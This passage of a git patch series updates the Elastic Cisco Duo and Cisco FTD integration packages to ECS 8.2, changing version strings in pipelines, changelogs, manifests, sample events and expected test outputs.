+- .../cisco_duo/data_stream/auth/sample_event.json | 2 +- .../test-offline-enrollment.log-expected.json | 2 +- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../offline_enrollment/sample_event.json | 2 +- .../test/pipeline/test-summary.log-expected.json | 4 ++-- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/summary/sample_event.json | 2 +- .../pipeline/test-telephony.log-expected.json | 6 +++--- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/telephony/sample_event.json | 2 +- packages/cisco_duo/docs/README.md | 10 +++++----- packages/cisco_duo/manifest.yml | 2 +- 19 files changed, 41 insertions(+), 36 deletions(-) diff --git a/packages/cisco_duo/_dev/build/build.yml b/packages/cisco_duo/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_duo/_dev/build/build.yml +++ b/packages/cisco_duo/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_duo/changelog.yml b/packages/cisco_duo/changelog.yml index dda3244b325..92330f0dd24 100644 --- a/packages/cisco_duo/changelog.yml +++ b/packages/cisco_duo/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "1.1.0" changes: - description: Update to ECS 8.0 diff --git a/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json b/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json index f39238f796c..2a24c4b898e 100644 --- a/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json +++ b/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-07-20T11:41:31.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "activation_begin", @@ -30,7 +30,7 @@ { "@timestamp": "2021-07-20T11:44:37.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:47.270944711Z", @@ -64,7 +64,7 @@ { "@timestamp": "2021-07-20T11:41:31.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "reason": "Starting activation process", @@ -93,7 +93,7 @@ { "@timestamp": "2021-07-20T11:44:09.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "activation_set_password", @@ -124,7 +124,7 @@ { "@timestamp": "2021-07-20T11:44:37.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:47.270949599Z", @@ -169,7 +169,7 @@ { "@timestamp": "2021-07-20T11:45:11.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:47.270950423Z", @@ -208,7 +208,7 @@ { "@timestamp": "2021-07-20T11:45:11.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:47.270951256Z", @@ -251,7 +251,7 @@ { "@timestamp": "2021-07-20T11:45:11.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:47.270952063Z", diff --git a/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml index 06c0a1fbea0..dcbe5374d7f 100644 --- a/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: "{{{_ingest.timestamp}}}" - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - rename: field: message target_field: event.original diff --git a/packages/cisco_duo/data_stream/admin/sample_event.json b/packages/cisco_duo/data_stream/admin/sample_event.json index b0540ca1730..6c70009ed53 100644 --- a/packages/cisco_duo/data_stream/admin/sample_event.json +++ b/packages/cisco_duo/data_stream/admin/sample_event.json @@ -21,7 +21,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json index c180bac4f72..e81ad507f86 100644 --- a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json +++ b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2020-02-13T18:56:20.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -110,7 +110,7 @@ { "@timestamp": "2021-07-23T07:21:51.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -232,7 +232,7 @@ { "@timestamp": "2021-08-12T09:14:23.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -354,7 +354,7 @@ { "@timestamp": "2021-07-23T07:20:54.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -473,7 +473,7 @@ { "@timestamp": "2021-07-23T07:19:34.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ diff --git a/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml index b7d397641ff..3e28b25521b 100644 --- a/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: "{{{_ingest.timestamp}}}" - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - rename: field: message target_field: event.original diff --git a/packages/cisco_duo/data_stream/auth/sample_event.json b/packages/cisco_duo/data_stream/auth/sample_event.json index 78688714127..9ee539726e6 100644 --- a/packages/cisco_duo/data_stream/auth/sample_event.json +++ b/packages/cisco_duo/data_stream/auth/sample_event.json @@ -50,7 +50,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json b/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json index 93d2745e4a7..d0c1e3cf4f2 100644 --- a/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json +++ b/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2019-08-30T16:10:05.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:52.266080492Z", diff --git a/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml index a25ff04d97e..755b4a4013c 100644 --- a/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: "{{{_ingest.timestamp}}}" - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - rename: field: message target_field: event.original diff --git a/packages/cisco_duo/data_stream/offline_enrollment/sample_event.json b/packages/cisco_duo/data_stream/offline_enrollment/sample_event.json index 34474bbeb1e..9a3e3e3eca7 100644 --- a/packages/cisco_duo/data_stream/offline_enrollment/sample_event.json +++ b/packages/cisco_duo/data_stream/offline_enrollment/sample_event.json @@ -27,7 +27,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json b/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json index b8bcf7e25b4..612fc2e848f 100644 --- a/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json +++ b/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-12-29T09:37:52.958306807Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:52.958306807Z", @@ -24,7 +24,7 @@ { "@timestamp": "2021-12-29T09:37:52.958309870Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:52.958309870Z", diff --git a/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml index e2d04020cd3..c39d30bf54b 100644 --- a/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: "{{{_ingest.timestamp}}}" - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - set: field: "@timestamp" value: "{{{_ingest.timestamp}}}" diff --git a/packages/cisco_duo/data_stream/summary/sample_event.json b/packages/cisco_duo/data_stream/summary/sample_event.json index d1b9379ca8f..21d5e9a30f1 100644 --- a/packages/cisco_duo/data_stream/summary/sample_event.json +++ b/packages/cisco_duo/data_stream/summary/sample_event.json @@ -21,7 +21,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json b/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json index d7e3ceb4b07..1fec8c77f96 100644 --- a/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json +++ b/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-07-22T12:59:30.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:53.175332756Z", @@ -25,7 +25,7 @@ { "@timestamp": "2021-08-16T06:03:32.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:53.175335209Z", @@ -47,7 +47,7 @@ { "@timestamp": "2020-03-20T15:38:12.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:53.175336142Z", diff --git a/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml index 96950ead8f1..1dff8344ee3 100644 --- a/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: "{{{_ingest.timestamp}}}" - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - set: field: event.kind value: event diff --git a/packages/cisco_duo/data_stream/telephony/sample_event.json b/packages/cisco_duo/data_stream/telephony/sample_event.json index ebb201a53b7..54bd428fb23 100644 --- a/packages/cisco_duo/data_stream/telephony/sample_event.json +++ b/packages/cisco_duo/data_stream/telephony/sample_event.json @@ -21,7 +21,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_duo/docs/README.md b/packages/cisco_duo/docs/README.md index 34f240166d2..89386adadb1 100644 --- a/packages/cisco_duo/docs/README.md +++ b/packages/cisco_duo/docs/README.md @@ -54,7 +54,7 @@ An example event for `admin` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", @@ -211,7 +211,7 @@ An example event for `auth` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", @@ -440,7 +440,7 @@ An example event for `offline_enrollment` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", @@ -551,7 +551,7 @@ An example event for `summary` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", @@ -656,7 +656,7 @@ An example event for `telephony` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_duo/manifest.yml b/packages/cisco_duo/manifest.yml index 17295446441..16afbb571ca 100644 --- a/packages/cisco_duo/manifest.yml +++ b/packages/cisco_duo/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_duo title: Cisco Duo -version: 1.1.0 +version: 1.2.0 license: basic description: Collect logs from Cisco Duo with Elastic Agent. type: integration From 27ae1d3cd8155cc773462918540c046ed536f4c2 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 15:26:52 -0600 Subject: [PATCH 12/23] Update cisco_ftd to ECS 8.2 --- packages/cisco_ftd/_dev/build/build.yml | 2 +- packages/cisco_ftd/changelog.yml | 5 + .../pipeline/test-asa-fix.log-expected.json | 10 +- .../test/pipeline/test-asa.log-expected.json | 536 +++++++++--------- .../test/pipeline/test-dns.log-expected.json | 42 +- .../pipeline/test-filtered.log-expected.json | 4 +- ...est-firepower-management.log-expected.json | 68 +-- .../pipeline/test-intrusion.log-expected.json | 8 +- .../test-no-type-id.log-expected.json | 8 +- .../pipeline/test-not-ip.log-expected.json | 6 +- .../pipeline/test-sample.log-expected.json | 142 ++--- ...test-security-connection.log-expected.json | 20 +- ...st-security-file-malware.log-expected.json | 20 +- ...st-security-malware-site.log-expected.json | 2 +- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/log/sample_event.json | 2 +- packages/cisco_ftd/docs/README.md | 2 +- packages/cisco_ftd/manifest.yml | 2 +- 18 files changed, 443 insertions(+), 438 deletions(-) diff --git a/packages/cisco_ftd/_dev/build/build.yml b/packages/cisco_ftd/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_ftd/_dev/build/build.yml +++ b/packages/cisco_ftd/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_ftd/changelog.yml b/packages/cisco_ftd/changelog.yml index 7d5a9522ec0..ac00c2d6a23 100644 --- a/packages/cisco_ftd/changelog.yml +++ b/packages/cisco_ftd/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.1.0" + changes: + - description: Update to ECS 8.1 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "2.0.0" changes: - description: Update to ECS 8.0 diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json index 116d1d52e93..06707472aa0 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -40,7 +40,7 @@ }, "@timestamp": "2020-04-17T14:08:08.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -119,7 +119,7 @@ }, "@timestamp": "2020-04-17T14:00:31.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -194,7 +194,7 @@ }, "@timestamp": "2013-04-15T09:36:50.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -264,7 +264,7 @@ }, "@timestamp": "2020-04-17T14:16:20.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -325,7 +325,7 @@ }, "@timestamp": "2020-04-17T14:15:07.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json index 2ee233b8c29..57dd8d150ca 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json @@ -43,7 +43,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -122,7 +122,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -206,7 +206,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -291,7 +291,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -376,7 +376,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -461,7 +461,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -546,7 +546,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -631,7 +631,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -716,7 +716,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -801,7 +801,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -886,7 +886,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -971,7 +971,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1056,7 +1056,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1141,7 +1141,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1226,7 +1226,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1311,7 +1311,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1396,7 +1396,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1481,7 +1481,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1566,7 +1566,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1650,7 +1650,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1729,7 +1729,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1813,7 +1813,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1897,7 +1897,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1981,7 +1981,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2064,7 +2064,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2143,7 +2143,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2226,7 +2226,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2305,7 +2305,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2389,7 +2389,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2473,7 +2473,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2557,7 +2557,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2641,7 +2641,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2724,7 +2724,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2803,7 +2803,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2886,7 +2886,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2965,7 +2965,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3049,7 +3049,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3133,7 +3133,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3217,7 +3217,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3300,7 +3300,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3379,7 +3379,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3463,7 +3463,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3547,7 +3547,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3631,7 +3631,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3715,7 +3715,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3798,7 +3798,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3877,7 +3877,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3961,7 +3961,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4046,7 +4046,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4130,7 +4130,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4214,7 +4214,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4297,7 +4297,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4376,7 +4376,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4459,7 +4459,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4538,7 +4538,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4621,7 +4621,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4700,7 +4700,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4784,7 +4784,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4868,7 +4868,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4951,7 +4951,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5030,7 +5030,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5113,7 +5113,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5192,7 +5192,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5276,7 +5276,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5360,7 +5360,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5444,7 +5444,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5523,7 +5523,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5607,7 +5607,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5690,7 +5690,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5769,7 +5769,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5822,7 +5822,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5899,7 +5899,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -5978,7 +5978,7 @@ }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, 